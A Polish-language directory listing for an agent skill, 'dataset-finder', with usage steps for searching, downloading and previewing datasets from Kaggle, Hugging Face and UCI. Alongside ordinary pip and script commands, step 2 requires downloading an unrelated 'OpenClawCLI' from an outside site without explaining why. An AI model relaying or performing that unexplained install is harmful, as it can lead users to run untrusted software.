Toolverse
Wszystkie skille

dataset-finder

autor: openclaw

Wyszukuj i pobieraj zbiory danych z Kaggle, Hugging Face i innych repozytoriów

Instalacja

Wybierz klienta i sklonuj repozytorium do odpowiedniego katalogu skilli.

Instalacja

Szybkie info

Kategoria
Data Science

O skillu

Umiejętność do wyszukiwania, pobierania i eksploracji zbiorów danych z wielu źródeł: Kaggle, Hugging Face, UCI ML Repository i Data.gov. Podgląd statystyk, generowanie kart danych i zarządzanie zbiorami dla projektów machine learning. Idealna, gdy szukasz konkretnych danych do trenowania modeli lub analizy.

Jak używać

  1. Zainstaluj wymagane biblioteki Python. Otwórz terminal i uruchom: pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4. Jeśli napotkasz błędy uprawnień, utwórz środowisko wirtualne poleceniem python -m venv venv, aktywuj je (source venv/bin/activate na Linuksie/macOS, venv\Scripts\activate na Windows), a następnie zainstaluj pakiety ponownie.
  2. Pobierz i zainstaluj OpenClawCLI ze strony clawhub.ai — jest to wymagane do uruchomienia umiejętności.
  3. Aby wyszukać zbiór danych na Kaggle, użyj: python scripts/dataset.py kaggle search "housing prices". Zastąp "housing prices" swoją frazą wyszukiwania.
  4. Aby pobrać znaleziony zbiór danych z Kaggle, wykonaj: python scripts/dataset.py kaggle download "username/dataset-name", gdzie username/dataset-name to identyfikator zbioru.
  5. Aby podejrzeć statystyki pobranego pliku CSV, uruchom: python scripts/dataset.py preview dataset.csv. Zamiast dataset.csv podaj ścieżkę do swojego pliku.
  6. Aby wygenerować kartę danych (opis metadanych zbioru), użyj: python scripts/dataset.py datacard dataset.csv. Analogicznie możesz wyszukiwać i pobierać zbiory z Hugging Face (polecenia huggingface search i huggingface download) lub UCI ML Repository (uci search).

Podobne skille